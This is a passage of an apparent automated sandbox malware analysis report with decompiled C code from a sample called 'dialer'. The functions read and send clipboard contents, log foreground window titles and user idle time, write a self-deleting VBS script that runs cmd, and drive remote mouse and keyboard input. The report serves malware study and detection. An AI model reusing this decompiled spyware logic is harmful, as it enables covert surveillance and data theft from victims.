												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E00447332(_v8);
								L0043EE85(_v8);
								L0043EE85(_v12);
								L0043EE85(_v16);
								goto L4;
							}
							L0043EE85(_t234);
							L0043EE85(_v12);
							L7:
							goto L4;
						}
						L0043EE85(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x46a188;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							L0043EE85( *(_t210 + 0x88));
							L0043EE85( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}

APIs

_free.LIBCMT ref: 00447478
_free.LIBCMT ref: 0044749C
_free.LIBCMT ref: 004474A9
_free.LIBCMT ref: 004474CE
_free.LIBCMT ref: 004474DB
_free.LIBCMT ref: 004474E4
_free.LIBCMT ref: 004477C2
_free.LIBCMT ref: 004477CA

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 13813e0503aa403512ca7e2c0b4c10e30c331b2821bac9253bacee607932b947
Instruction ID: e6ea3b258e32db2a5a612ec849509408c7eabbb72dddc33eac43ea41aa3f9500
Opcode Fuzzy Hash: 13813e0503aa403512ca7e2c0b4c10e30c331b2821bac9253bacee607932b947
Instruction Fuzzy Hash: 6DC15672D45204AFEB20DBA9CC83FEE77F8AB08704F14415AFA05FB382D674994197A5

Uniqueness

Uniqueness Score: -1.00%

Function 004126A5, Relevance: 18.1, APIs: 12, Instructions: 83
clipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004126A5(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
				void* __ebx;
				int _t10;
				void* _t20;
				void* _t22;
				void* _t31;
				struct HWND__* _t38;
				void* _t57;
				void* _t61;
				void* _t64;
				void* _t66;

				_t55 = __edx;
				_t10 = OpenClipboard(_t38);
				_t68 = _t10;
				if(_t10 != 0) {
					EmptyClipboard();
					L00401E29( &_a16, _t55, _t68, _t38);
					_t57 = GlobalAlloc(0x2000, E00402469() + 2);
					_t20 = GlobalLock(_t57);
					L00401E29( &_a12, _t55, _t68, _t38);
					_t22 = E00402469();
					L00431DF0(_t20, L00401F75(L00401E29( &_a8, _t55, _t68, _t38)), _t22);
					_t66 = _t64 + 0xc;
					GlobalUnlock(_t57);
					SetClipboardData(0xd, _t57);
					CloseClipboard();
					if(OpenClipboard(_t38) != 0) {
						_t61 = GetClipboardData(0xd);
						_t31 = GlobalLock(_t61);
						GlobalUnlock(_t61);
						CloseClipboard();
						_t50 =  !=  ? _t31 : 0x45f714;
						E0040425F(_t38,  &_a36,  !=  ? _t31 : 0x45f714);
						_t55 =  &_a32;
						E00416CF4(_t38, _t66 - 0x18,  &_a32);
						_push(0x6b);
						E00404A6E(_t38, 0x46c768,  &_a32, _t31);
						L00401ED0();
					}
				}
				L00401E54( &_a16, _t55);
				L00401FA7();
				L00401FA7();
				return 0;
			}

APIs

OpenClipboard.USER32 ref: 004126A6
EmptyClipboard.USER32 ref: 004126B4
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004126D4
GlobalLock.KERNEL32 ref: 004126DD
GlobalUnlock.KERNEL32(00000000), ref: 00412713
SetClipboardData.USER32 ref: 0041271C
CloseClipboard.USER32 ref: 00412739
OpenClipboard.USER32 ref: 00412740
GetClipboardData.USER32 ref: 00412750
GlobalLock.KERNEL32 ref: 00412759
GlobalUnlock.KERNEL32(00000000), ref: 00412762
CloseClipboard.USER32 ref: 00412768

Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID:
API String ID: 3520204547-0
Opcode ID: 1176a2fa92a27c2bfc0c58389ed509e639c1d09a8cc1b0c481b7c4fd4d2cf595
Instruction ID: 760fdb740c6fae1fa457759c4ec7e7655d91424e05930c477d6cb01e2b71feaa
Opcode Fuzzy Hash: 1176a2fa92a27c2bfc0c58389ed509e639c1d09a8cc1b0c481b7c4fd4d2cf595
Instruction Fuzzy Hash: 5D2151716043009BC214BF71ED5A9BF7769AB90746F04443EF806D21E2EF78CA09866A

Uniqueness

Uniqueness Score: -1.00%

Function 0044E57E, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0044E57E(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E0044E2E1(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E00447125(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E0044E24C();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0044706E(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x46b800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = L0044DFFF(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x46b800 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E0044E24C();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x46b800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											L00439DDE(GetLastError());
											 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E00447237( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E0044E45D(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E0044419C(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							L00439DDE(_t270);
							 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(L00439E14())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x46b800 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							L00439DDE(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E0044E24C();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(L00439E01()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(L00439E14())) = 0x18;
						goto L2;
					}
				} else {
					 *(L00439E01()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(L00439E14()));
				}
			}

APIs

Part of subcall function 0044E24C: CreateFileW.KERNEL32(00000000,?,?,'D,?,?,00000000,?,0044E627,00000000,0000000C), ref: 0044E269

GetLastError.KERNEL32 ref: 0044E692
__dosmaperr.LIBCMT ref: 0044E699
GetFileType.KERNEL32(00000000), ref: 0044E6A5
GetLastError.KERNEL32 ref: 0044E6AF
__dosmaperr.LIBCMT ref: 0044E6B8
CloseHandle.KERNEL32(00000000), ref: 0044E6D8
CloseHandle.KERNEL32(?), ref: 0044E822
GetLastError.KERNEL32 ref: 0044E854
__dosmaperr.LIBCMT ref: 0044E85B

Strings

H, xrefs: 0044E7E0

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 83729db6a556a1019528efa5bc2c08794c0b27a863824bfcaf4dfbdb965bda8a
Instruction ID: 9379966339f950b9aa3d097b32b00a291e03590e13bcb8f4c88e3fc2e04714d3
Opcode Fuzzy Hash: 83729db6a556a1019528efa5bc2c08794c0b27a863824bfcaf4dfbdb965bda8a
Instruction Fuzzy Hash: 8CA13732A101489FEF18EF69D8527AE7BA0EF06324F14015EF811DB391D7788D12C76A

Uniqueness

Uniqueness Score: -1.00%

Function 00409197, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00409197(void* __ecx, void* __edx) {
				char _v28;
				char _v56;
				char _v76;
				char _v80;
				char _v100;
				void* _v104;
				char _v108;
				char _v112;
				struct HWND__* _v116;
				void* __ebx;
				void* __edi;
				int _t36;
				struct HWND__* _t42;
				void* _t50;
				int _t57;
				struct HWND__* _t77;
				void* _t119;
				signed int _t125;
				void* _t127;

				_t112 = __edx;
				_t127 = (_t125 & 0xfffffff8) - 0x74;
				_push(_t77);
				_push(0xea60);
				_t119 = __ecx;
				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
					Sleep(0x1f4);
					_t77 = GetForegroundWindow();
					_t36 = GetWindowTextLengthW(_t77);
					_t4 = _t36 + 1; // 0x1
					L00409DEE(_t77,  &_v100, _t112, _t119, _t4, 0);
					if(_t36 != 0) {
						_t57 = E00402469();
						GetWindowTextW(_t77, L00401ECB( &_v100), _t57);
						_t112 = 0x46dcf4;
						if(L00409EAE(0x46dcf4) == 0) {
							L00409DD4(0x46dcf4,  &_v100);
							E00407341(E00402469() - 1);
							_t127 = _t127 - 0x18;
							_t136 =  *0x46c39b;
							if( *0x46c39b == 0) {
								_t112 = L00409E6B( &_v76, L"\r\n[ ", __eflags,  &_v108);
								E00403086(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
								E00408B82(_t119);
								L00401ED0();
							} else {
								E00407352(_t77, _t127, 0x46dcf4, _t136,  &_v108);
								E00409636(_t77, _t119, _t136);
							}
						}
					}
					_t83 = _t119;
					E00409C17(_t119);
					if(E00416B2E(_t119) < 0xea60) {
						L18:
						L00401ED0();
						continue;
					} else {
						_t77 = _v116;
						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
							_t42 = E00416B2E(_t83);
							if(_t42 < 0xea60) {
								__eflags = _t77 % 0xea60;
								E0043A6FF(_t83, _t77 / 0xea60,  &_v112, 0xa);
								_t50 = E0040530D(_t77,  &_v80, E004075C4(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00402064(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
								_t127 = _t127 + 0xc - 0x14;
								_t112 = _t50;
								E00416C32(_t127, _t50);
								E00408B82(_t119);
								L00401FA7();
								L00401FA7();
								L00401FA7();
								goto L18;
							}
							_t77 = _t42;
							_v116 = _t77;
							Sleep(0x3e8);
						}
						L00401ED0();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}

APIs

__Init_thread_footer.LIBCMT ref: 004091F9
Sleep.KERNEL32(000001F4), ref: 00409204
GetForegroundWindow.USER32 ref: 0040920A
GetWindowTextLengthW.USER32(00000000), ref: 00409213
GetWindowTextW.USER32 ref: 00409247
Sleep.KERNEL32(000003E8), ref: 00409315

Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B

Part of subcall function 00408B82: SetEvent.KERNEL32(?,?,?,?,00409CFE,?,?,?,?,?,00000000), ref: 00408BAF

Strings

{ User has been idle for , xrefs: 00409347
minutes }, xrefs: 0040933B
[ , xrefs: 004092AF
], xrefs: 004092A9

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
String ID: [ ${ User has been idle for $ ]$ minutes }
API String ID: 107669343-3343415809
Opcode ID: 1e0b64def89c5051b04aa9bccde2e930d90b153b4cd63e869604e6f74576e0b0
Instruction ID: d658e1a33bd020368734ed71537e8d6ac9b7a6128b86f83b49787c6d35493bb7
Opcode Fuzzy Hash: 1e0b64def89c5051b04aa9bccde2e930d90b153b4cd63e869604e6f74576e0b0
Instruction Fuzzy Hash: 6651D471A083415BC714FB22C846A6E7795AF84308F44053FF886A62E3EF7C9E45C68B

Uniqueness

Uniqueness Score: -1.00%

Function 0040B80B, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B80B(void* __ebx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				short _v716;
				void* __edi;
				void* __ebp;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t54;
				void* _t67;
				void* _t68;
				void* _t79;

				_t79 = __ebx;
				E0040FB4B();
				_t36 = E00402469();
				_t37 = L00401F75(0x46c560);
				_t40 = E00410420(L00401F75(0x46c518), "exepath",  &_v716, 0x208, _t37, _t36);
				_t140 = _t40;
				if(_t40 == 0) {
					GetModuleFileNameW(0,  &_v716, 0x208);
				}
				E00403086(_t79,  &_v124, E00416C32( &_v52, E004169EB( &_v76)), 0, _t140, L".vbs");
				L00401ED0();
				L00401FA7();
				E00404409(_t79,  &_v100, E00403086(_t79,  &_v76, E0040425F(_t79,  &_v52, E0043918F(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
				L00401ED0();
				L00401ED0();
				L00401F4D(_t79,  &_v28);
				_t54 = E0040425F(_t79,  &_v196, L"\"\"\", 0");
				E004032F1(E00403086(_t79,  &_v76, E00403010( &_v52, E00403086(_t79,  &_v148, E0040425F(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				E0040766E(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
				_t67 = L00401ECB( &_v100);
				_t68 = E00402469();
				if(E0041729F(L00401ECB( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", L00401ECB( &_v100), 0x45f714, 0x45f714, 0) > 0x20) {
					ExitProcess(0);
				}
				L00401ED0();
				L00401ED0();
				return L00401ED0();
			}

APIs

Part of subcall function 0040FB4B: TerminateProcess.KERNEL32(00000000,?,0040B118), ref: 0040FB5B
Part of subcall function 0040FB4B: WaitForSingleObject.KERNEL32(000000FF,?,0040B118), ref: 0040FB6E

Part of subcall function 00410420: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 0041043C
Part of subcall function 00410420: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410455
Part of subcall function 00410420: RegCloseKey.ADVAPI32(00000000), ref: 00410460

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B865
ShellExecuteW.SHELL32(00000000,open,00000000,0045F714,0045F714,00000000), ref: 0040B9C4
ExitProcess.KERNEL32 ref: 0040B9D0

Strings

CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040B973
""", 0, xrefs: 0040B8ED
exepath, xrefs: 0040B83D
Temp, xrefs: 0040B8A6
open, xrefs: 0040B9BE
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040B905
.vbs, xrefs: 0040B86B

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-2411266221
Opcode ID: 998cdbba718eadb24a103a7e37909eb3fb99a79c7a6643fa32b985e9ab2342a0
Instruction ID: e165f019403b777232d5c6ec79ea45895c0ef20fb9be7ec1ee46aed41850c1d8
Opcode Fuzzy Hash: 998cdbba718eadb24a103a7e37909eb3fb99a79c7a6643fa32b985e9ab2342a0
Instruction Fuzzy Hash: 67418F319100185ACB14FB62DC96DEE7739AF50744F10017FF406B20E2EF385E8ACA99

Uniqueness

Uniqueness Score: -1.00%

Function 00414923, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00414923(signed int __edx, void* __eflags, char _a8) {
				void* _v28;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				intOrPtr* _t60;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t74;
				char* _t79;
				char* _t80;
				char* _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				intOrPtr _t90;
				signed int _t101;
				signed int _t109;
				signed int _t118;
				signed int _t136;

				_t136 = __edx;
				_t90 =  *((intOrPtr*)(E004051EA(0)));
				E00404286( &_a8,  &_v32, 1, 0xffffffff);
				if(_t90 != 0x30) {
					__eflags = _t90 - 0x31;
					if(_t90 != 0x31) {
						__eflags = _t90 - 0x32;
						if(_t90 != 0x32) {
							__eflags = _t90 - 0x33;
							if(_t90 != 0x33) {
								__eflags = _t90 - 0x34;
								if(_t90 != 0x34) {
									__eflags = _t90 - 0x35;
									if(_t90 != 0x35) {
										__eflags = _t90 - 0x36;
										if(_t90 == 0x36) {
											_push(0);
											_push(0x78);
											goto L15;
										}
									} else {
										_push(0);
										_push(0xffffff88);
										L15:
										mouse_event(0x800, 0, 0, ??, ??);
									}
								} else {
									_v40 =  *((intOrPtr*)(E004051EA(0)));
									_t60 = E004051EA(4);
									_t101 =  *0x46bd74; // 0x0
									_v40 =  *_t60;
									E004147BD( *((intOrPtr*)(0x46bd78 + _t101 * 4)),  &_v44, __eflags,  &_v40);
									E00414BEF(_v44, _v40);
								}
							} else {
								_t65 = E004051EA(0);
								_v44 =  *((intOrPtr*)(E004051EA(4)));
								_t67 = E004051EA(8);
								_t109 =  *0x46bd74; // 0x0
								_v44 =  *_t67;
								E004147BD( *((intOrPtr*)(0x46bd78 + _t109 * 4)),  &_v48, __eflags,  &_v44);
								E00414B93( *_t65, _v48, _v44);
								goto L8;
							}
						} else {
							_t72 = E004051EA(0);
							_v40 =  *((intOrPtr*)(E004051EA(4)));
							_t74 = E004051EA(8);
							_t118 =  *0x46bd74; // 0x0
							_v48 =  *_t74;
							E004147BD( *((intOrPtr*)(0x46bd78 + _t118 * 4)),  &_v44, __eflags,  &_v48);
							E00414B37( *_t72, _v44, _v48);
							goto L8;
						}
					} else {
						_t79 = E004051EA(4);
						_t80 = E004051EA(3);
						_t81 = E004051EA(2);
						_t82 = E004051EA(0);
						 *_t79 =  *_t80;
						__eflags =  *_t81;
						E00414C27( *_t82, __edx & 0xffffff00 |  *_t81 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0 |  *_t80 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0x000000ff);
						goto L8;
					}
				} else {
					E004051EA(0);
					_t85 = E004051EA(1);
					L00413F3B( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E004051EA(2)));
					L8:
				}
				L00401FA7();
				return L00401FA7();
			}

APIs

StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 00414977
mouse_event.USER32 ref: 00414B19

Part of subcall function 004147BD: GetSystemMetrics.USER32 ref: 004147F2
Part of subcall function 004147BD: GetSystemMetrics.USER32 ref: 00414807

Part of subcall function 00414BEF: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 00414C1B

Strings

5, xrefs: 00414B00
2, xrefs: 004149EE
6, xrefs: 00414B0A
3, xrefs: 00414A4E
4, xrefs: 00414AAF
1, xrefs: 0041498F
0, xrefs: 0041494D

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: MetricsSystem$InputSendmouse_event
String ID: 0$1$2$3$4$5$6
API String ID: 1731092567-2737206560
Opcode ID: 465a40b6c4bbad9506da93c7662b821433875c1b0bd26355eb879b2e96cd732d
Instruction ID: 68c723f4934a31661bb6c48b0de6a348d1b664bcb13febd58c7bbbb5345cd8c0
Opcode Fuzzy Hash: 465a40b6c4bbad9506da93c7662b821433875c1b0bd26355eb879b2e96cd732d
Instruction Fuzzy Hash: CA518D70A083019FD704EF21D865F9B77A8EF95314F00492EF5525B2D1DF38AA49CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0044F2E4, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044FEEF), ref: 0044F307

Strings

asin, xrefs: 0044F473
sqrt, xrefs: 0044F48B
@, xrefs: 0044F37D, 0044F417, 0044F4CF
pow, xrefs: 0044F3EB, 0044F497, 0044F4AA
exp, xrefs: 0044F3CC, 0044F42E
log, xrefs: 0044F3AD, 0044F3B9
acos, xrefs: 0044F47F
log10, xrefs: 0044F351, 0044F3A1

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt$@
API String ID: 3527080286-3098891844
Opcode ID: 2dadbbac7597865ff50da2a3c3a534bf5187b14ce0e3ba92897013525b7cc476
Instruction ID: c22834c9641bea404e8976183de0de3b5e68054bdcba2795ef1ced98d83d77b1
Opcode Fuzzy Hash: 2dadbbac7597865ff50da2a3c3a534bf5187b14ce0e3ba92897013525b7cc476
Instruction Fuzzy Hash: A4518F71900609CBEF10DF98E9484AEBBB0FB59305F6041A7D841A7355CB798E2DCB2E

Uniqueness

Uniqueness Score: -1.00%

Function 004053B7, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 147
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004053B7(char* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t27;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t54;
				void* _t65;
				void* _t66;
				void* _t68;
				intOrPtr _t102;
				void* _t106;
				struct HWND__* _t109;
				signed int _t110;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t116;

				_t118 = __eflags;
